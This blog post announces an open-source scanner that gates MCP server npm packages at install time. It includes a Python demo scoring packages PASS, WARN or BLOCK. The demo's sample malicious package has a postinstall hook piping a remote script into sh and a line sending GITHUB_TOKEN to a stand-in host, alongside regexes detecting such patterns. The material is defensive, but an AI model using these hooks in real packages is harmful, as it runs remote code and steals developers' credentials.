The MCP ecosystem has been growing fast, but its supply-chain hygiene has not kept up. MCPwn (CVE-2026-33032, CVSS 9.8) exposed 2,600+ instances. The Shai-Hulud npm worm stole MCP auth tokens from 172 packages. MCPSafe found high-severity bugs in official MCPs from Atlassian, GitHub, Cloudflare, and Microsoft. Perplexity open-sourced Bumblebee in May 2026 specifically because no good scanner existed.

So I built one. Today I'm shipping @weiseer/mcp-doctor, an open-source install-time trust gate for MCP server packages, together with the validation dataset that surfaced its first real finding.

TL;DR

```
npx @weiseer/mcp-doctor @some/mcp-server
```

It returns PASS / WARN / BLOCK with cited evidence per signal. The full scoring rubric is open-source, so you can argue with the methodology rather than trust a black box. There is a free public scan endpoint at https://api.weiseer.com/scan (60 requests/min/IP, no auth).…
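To make the "verdict plus cited evidence per signal" shape concrete, here is an added illustration of an install-time gate over an npm package. It is my example, not mcp-doctor's code or its published rubric: the signal names, the WARN/BLOCK levels, the regexes and the sample packages are all assumptions constructed for the demo. It checks the two things an install-time gate most wants to see before `npm install` runs anything: lifecycle hooks that fetch and execute remote content, and source that reads `process.env` and also makes outbound calls (the shape of a token stealer, but also the shape of a legitimate MCP server, which is why that one is only a WARN).

```python
"""Added illustration of an install-time trust gate for an npm package.

Not mcp-doctor's code or rubric; signals, levels and thresholds are
assumptions chosen to show PASS / WARN / BLOCK with evidence per signal.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Hooks npm runs without the user asking for anything but "install".
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# A hook that pipes remote content into a shell/node is treated as BLOCK (assumption).
REMOTE_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|node)\b|\bnode\s+-e\b")
# Outbound-network shapes in JS source (assumption: these three cover the common cases).
NETWORK_CALL = re.compile(r"\bfetch\s*\(|\bhttps?\.request\s*\(|\baxios\b")
# Per-line source patterns that earn a WARN with the offending line as evidence.
SOURCE_PATTERNS = {
    "dynamic-eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "long-base64-literal": re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]"),
}


@dataclass
class Signal:
    name: str
    level: str      # "WARN" or "BLOCK"
    evidence: str   # "file:location: excerpt", so a reviewer can check the claim


@dataclass
class Verdict:
    result: str     # "PASS" | "WARN" | "BLOCK"
    signals: list[Signal] = field(default_factory=list)


def check_lifecycle_hooks(pkg: dict) -> list[Signal]:
    """Any install-time hook is at least a WARN; remote fetch-and-run is a BLOCK."""
    out = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        level = "BLOCK" if REMOTE_EXEC.search(cmd) else "WARN"
        out.append(Signal("lifecycle-hook", level, f"package.json:scripts.{hook}: {cmd}"))
    return out


def check_sources(files: dict[str, str]) -> list[Signal]:
    """Scan shipped JS for eval/obfuscation and for env-read-plus-network in one file."""
    out = []
    for path, text in files.items():
        for i, line in enumerate(text.splitlines(), 1):
            for name, pat in SOURCE_PATTERNS.items():
                if pat.search(line):
                    out.append(Signal(name, "WARN", f"{path}:{i}: {line.strip()[:80]}"))
        # Reading secrets and calling out is what a token stealer does, but also what
        # a real MCP server does with its API token, so this stays a WARN (assumption).
        if "process.env" in text:
            for i, line in enumerate(text.splitlines(), 1):
                if NETWORK_CALL.search(line):
                    out.append(Signal("env-read-plus-network", "WARN",
                                      f"{path}:{i}: {line.strip()[:80]}"))
                    break
    return out


def scan_package(pkg: dict, files: dict[str, str]) -> Verdict:
    """Aggregate signals: any BLOCK blocks, any WARN warns, nothing found passes."""
    signals = check_lifecycle_hooks(pkg) + check_sources(files)
    if any(s.level == "BLOCK" for s in signals):
        return Verdict("BLOCK", signals)
    if signals:
        return Verdict("WARN", signals)
    return Verdict("PASS", signals)


# Constructed sample packages (not real packages); file contents are inline strings.
CLEAN_PKG = {"name": "@example/clean-mcp", "scripts": {"build": "tsc", "test": "vitest"}}
CLEAN_FILES = {"dist/index.js": "const server = createServer();\nserver.listen();\n"}
BAD_PKG = {"name": "@example/bad-mcp",
           "scripts": {"postinstall": "curl -s https://example.invalid/x.sh | sh"}}
BAD_FILES = {"dist/index.js": 'const t = process.env.GITHUB_TOKEN;\n'
                              'fetch("https://example.invalid/c", {method: "POST", body: t});\n'}

if __name__ == "__main__":
    for pkg, files in ((CLEAN_PKG, CLEAN_FILES), (BAD_PKG, BAD_FILES)):
        v = scan_package(pkg, files)
        print(pkg["name"], v.result)
        for s in v.signals:
            print(f"  [{s.level}] {s.name}: {s.evidence}")
```

The point of the evidence string is that a verdict on its own is unfalsifiable; a reviewer who disagrees with a WARN should be able to open the cited file and line and argue with the rule, which is the same reason a published rubric matters more than a score.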